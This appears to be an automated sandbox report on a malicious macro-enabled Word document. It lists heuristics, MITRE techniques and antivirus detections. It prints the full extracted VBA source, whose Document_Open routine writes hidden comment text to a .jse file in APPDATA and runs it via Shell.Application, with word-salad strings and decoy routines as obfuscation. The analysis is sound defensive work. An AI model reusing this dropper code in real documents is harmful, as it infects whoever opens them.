MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious OOXML document containing a VBA macro. The macro is triggered by the Document_Open event and uses CreateObject to execute code, indicating it's designed to download and run a second-stage payload. ClamAV detections further confirm its malicious nature. The specific payload or C2 infrastructure is not directly evident from the provided script, leading to an 'unknown family' classification.
Heuristics 8
-
ClamAV: Doc.Malware.Generickdz-9375646-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generickdz-9375646-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
id1EN98i37 = 681681 Set hahahah = CreateObject("Shell.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() Dim jora As String -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Private Function env2() As String env2 = Environ("APPDATA") Dim b1ns8A146IP As String -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11087 bytes |
SHA-256: 9cb6d3968b0980aa1a257b6cb068f04e463a6019b815dcb6528a9f89e46b2b90 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ParaForceOneLine()
Dim objPara As Paragraph
Const ChangeSize = 0.5
For Each objPara In ActiveDocument.Paragraphs
With objPara.Range
While .Information(wdFirstCharacterLineNumber) <> _
.Characters(Len(.Text)).Information(wdFirstCharacterLineNumber)
Wend
End With
Next objPara
End Sub
Private Function notSrc() As String
Dim tableRng As Range
Set tableRng = ActiveDocument.Comments(1).Range
tableRng.TextRetrievalMode.IncludeHiddenText = True
Dim scr As String
scr = tableRng.Text
notSrc = scr
End Function
Sub FindBullet()
Dim rngTarget As Word.Range
Dim oPara As Word.Paragraph
Set rngTarget = Selection.Range
With rngTarget
Call .Collapse(wdCollapseEnd)
.End = ActiveDocument.Range.End
Dim t13rM228E As String
t13rM228E = "love load change ought horse is exist year spirit vessels silk before carry wonder probably job surface load pour biggest warn brass discover dot aboard deeply green rays stems door partly surface shoe vast except morning dangerous became children magic melted find same dust yet guide doctor nobody spend roar quite apartment mathematics cool furniture mine find army origin syllable television further ready milk large needle poetry minute action exchange fish born bright jungle sit carry chicken shelf world pipe also kind die frame measure pan bridge company fuel cream stranger softly differ poor concerned driven zero parts problem feathers talk nearest struck poor nature before"
For Each oPara In .Paragraphs
If oPara.Range.ListFormat.ListType = _
WdListType.wdListBullet Then
oPara.Range.Select
Exit For
End If
Next
End With
End Sub
Private Function env2() As String
env2 = Environ("APPDATA")
Dim b1ns8A146IP As String
b1ns8A146IP = "born everywhere lot fat rose vertical potatoes cotton knife properly parallel worker aboard nice major basis highest receive level began frame feathers carry second mouse good written long shall too plane replied eye energy hospital frequently walk salt fence animal slide chemical yet donkey correct entire magnet temperature sheep quiet him season unless explanation became related lift owner will principle slope wolf above chest year off old eight once orbit were different room deeply purpose one care become noted material breathe explore copy whatever obtain extra biggest collect enjoy characteristic tape sink rest nobody along twice manner held low swing worry force its lady television rising molecular human not support careful sets known now chain final been within"
End Function
Private Function nmae() As String
Dim name As String
name = Rnd
Dim H76Y3PP1 As String
H76Y3PP1 = "pen discovery weight process solve did pan skin stems definition improve rock proud look tongue continued driver sit in lose art numeral pole shinning warn fed shade arrive wood life seed work offer sight valley relationship they coffee ground throat business stay rhyme those musical pool use funny funny wagon minute fog can thirty jack driven perhaps twelve animal share battle had learn whistle shirt missing heart why giving verb load walk sometime further went throw draw oldest arrive education instead present sheep price did principle does railroad herd clear give bent outer final beat start two variety fuel itself affect sharp although note war folks"
name = "\\" & name & ".jse"
nmae = name
End Function
Sub WordFrequency()
Dim SingleWord As String 'Raw word pulled from doc
Const maxwords = 9000 'Maximum unique words allowed
Dim Words(maxwords) As String 'Array to hold unique words
Dim Freq(maxwords) As Integer 'Frequency counter for unique words
Dim WordNum As Integer 'Number of unique words
Dim ByFreq As Boolean 'Flag for sorting order
Dim ttlwds As Long 'Total words in the document
Dim Excludes As String 'Words to be excluded
Dim Found As Boolean 'Temporary flag
Dim j As Integer 'Temporary variables
Dim k As Integer '
Dim l As Integer '
Dim Temp As Integer '
Dim tword As String '
' Set up excluded words
Excludes = "[the][a][of][is][to][for][this][that][by][be][and][are]"
' Find out how to sort
ByFreq = True
ans = InputBox$("Sort by WORD or by FREQ?", "Sort order", "WORD")
If ans = "" Then End
If UCase(ans) = "WORD" Then
ByFreq = False
End If
Dim kjKE6q40w2d As String
kjKE6q40w2d = "worry page scared cattle mountain enter mine rubbed needs order from so either youth zero people grabbed independent bean consonant construction pressure dinner religious piano monkey us truck unless discussion gentle knowledge amount spend change man hat ring nor vowel dress equipment supper motor ancient giant able seat trade slope fully feathers noon trick pond yes came police fight cowboy carbon range dry right watch driver riding trap higher master bark noun wave dozen duty might snow refused effort differ fifty pleasure is create dug wooden cave excited donkey carbon curve mostly boy include birth dug volume store jungle worker camera gently coat deeply mountain walk handsome society cow"
Selection.HomeKey Unit:=wdStory
System.Cursor = wdCursorWait
WordNum = 0
ttlwds = ActiveDocument.Words.Count
' Control the repeat
For Each aword In ActiveDocument.Words
SingleWord = Trim(LCase(aword))
If SingleWord < "a" Or SingleWord > "z" Then SingleWord = "" 'Out of range?
If InStr(Excludes, "[" & SingleWord & "]") Then SingleWord = "" 'On exclude list?
If Len(SingleWord) > 0 Then
Found = False
For j = 1 To WordNum
If Words(j) = SingleWord Then
Freq(j) = Freq(j) + 1
Found = True
Exit For
End If
Next j
If Not Found Then
WordNum = WordNum + 1
Words(WordNum) = SingleWord
Freq(WordNum) = 1
End If
If WordNum > maxwords - 1 Then
Exit For
End If
End If
ttlwds = ttlwds - 1
StatusBar = "Remaining: " & ttlwds & " Unique: " & WordNum
Next aword
' Now sort it into word order
For j = 1 To WordNum - 1
k = j
For l = j + 1 To WordNum
Next l
If k <> j Then
tword = Words(j)
Words(j) = Words(k)
Words(k) = tword
Temp = Freq(j)
Freq(j) = Freq(k)
Freq(k) = Temp
End If
StatusBar = "Sorting: " & WordNum - j
Next j
Dim qR4U8q5w3M As String
qR4U8q5w3M = "sell once traffic built heart laid proper piece folks own studied fat see speech she farther attempt angry new principle ever satellites needed equator science religious buried ants represent fun ranch some electricity fell cookies birthday coffee drove slightly pen balloon sugar what twice cabin small what stock split hurry see thou closer afternoon with mouth end roll fat yesterday fire quickly motion flower on swung beauty closer bet tales principal once season pond ask selection breeze yes shot one clear winter snow declared teach idea night seen imagine invented harder master central newspaper surprise piano fat recently union town success bee"
' Now write out the results
tmpName = ActiveDocument.AttachedTemplate.FullName
Documents.Add Template:=tmpName, NewTemplate:=False
Selection.ParagraphFormat.TabStops.ClearAll
With Selection
For j = 1 To WordNum
.TypeText Text:=Trim(Str(Freq(j))) & vbTab & Words(j) & vbCrLf
Next j
End With
System.Cursor = wdCursorNormal
j = MsgBox("There were " & Trim(Str(WordNum)) & _
" different words ", vbOKOnly, "Finished")
End Sub
Private Sub Document_Open()
Dim jora As String
jora = env2 & nmae
Open jora For Output As #5
Print #5, notSrc
Dim I06k185T3 As String
I06k185T3 = "silence glass stomach football central sink nation plane straw after south trap kitchen heard anyone about terrible avoid cattle congress labor shaking chief gun balloon tip anywhere mix enter church earn possibly flow physical herself ourselves ball weigh motion foot flat third impossible fierce home article behavior lucky baseball space feature except claws whole actually direction however noun moving coal dead victory fastened aware went dry drawn everything find dark origin nuts rapidly jar spring pool next crowd swam zoo film gas ship elephant up although tried afternoon body relationship run possibly fighting explain bee language magnet too discovery crew writing gun sing lose loose liquid story having business excited youth finger addition speak are four standard attention"
Close #5
Dim sOQ549GFgA5A As Long
sOQ549GFgA5A = 2534439
Dim id1EN98i37 As Long
id1EN98i37 = 681681
Set hahahah = CreateObject("Shell.Application")
Dim T1Pd49 As Boolean
T1Pd49 = True
Dim Qn4Xb69 As Boolean
Qn4Xb69 = True
hahahah.ShellExecute (jora)
Dim ik996 As String
ik996 = "teacher smaller continued cast truth has village nearby gone naturally question valley original opportunity hit death slope breeze birthday finger explanation article development shine mirror shadow reader truth song somehow torn ill sing pink sang planet nearest satisfied hunt this central appropriate evidence having over back forget crop bark climate silence drop discuss come heat birthday second become continued explore circus globe simply noon tip fellow told carbon wheat natural length term sense ate attack upon chosen or human travel truck river sea ear program fastened why bag vertical pay flies find short drive of official affect hard underline motion fifty blew dull wife large through blind somewhere evening shadow once ruler child camera giant smile key"
Set hahahah = Nothing
End Sub
Attribute VB_Name = "NewMacros"
Sub p()
End Sub
Attribute VB_Name = "notForm"
Attribute VB_Base = "0{C8A51FBA-5900-47E3-803E-93996E4E8A9F}{D7FF62B5-E467-4EEB-878A-7F0C619909D3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 107520 bytes |
SHA-256: 69aeddf6b86a1e3cf628a120940ce847f7ea770305d4ea165e31a01360456d22 |
|||
|
Detection
ClamAV:
Doc.Malware.Generickdz-9375646-0
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 21 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.